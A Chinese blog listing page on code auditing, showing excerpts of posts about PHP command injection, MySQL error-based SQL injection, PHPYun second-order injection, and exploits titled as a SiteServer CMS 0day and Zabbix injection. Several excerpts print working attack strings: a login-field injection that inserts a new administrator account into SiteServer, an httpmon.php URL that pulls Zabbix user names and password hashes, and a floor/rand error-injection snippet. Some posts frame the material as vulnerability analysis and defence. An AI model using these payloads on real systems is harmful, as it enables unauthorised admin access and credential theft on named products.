代码审计
文章平均质量分 69
爬虫仔蛙
两全其美皆大欢喜
展开
-
php 命令执行系列
2012-06-27 15:44:11摘要:PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。本文描述了常见的PHP命令注入攻击漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入攻击漏洞给出了可行的方法和建议。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本转载 2015-08-11 10:18:32 · 6360 阅读 · 1 评论 -
mysql注入中三种报错模式利用方法详解
1、通过floor报错可以通过如下一些利用代码 代码如下复制代码and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);and (select count(转载 2015-01-17 01:25:02 · 832 阅读 · 0 评论 -
SiteServer CMS 0Day
经测试秒杀最新的3.5版 EXP:直接访问UserCenter/login.aspx用户名处输入:123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte转载 2015-01-09 16:01:53 · 2796 阅读 · 0 评论 -
漏洞利用代码
zabbix注入 http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29原创 2015-01-09 12:50:13 · 662 阅读 · 0 评论 -
二次注入审计问题
http://www.jianshu.com/p/e7cf997d6ccb危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析字数1455 阅读53 评论0 喜欢0今天分析是PHPYun的一个二次注入漏洞(漏洞详情)。0x00 知识前提PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,原创 2015-11-06 23:47:23 · 856 阅读 · 0 评论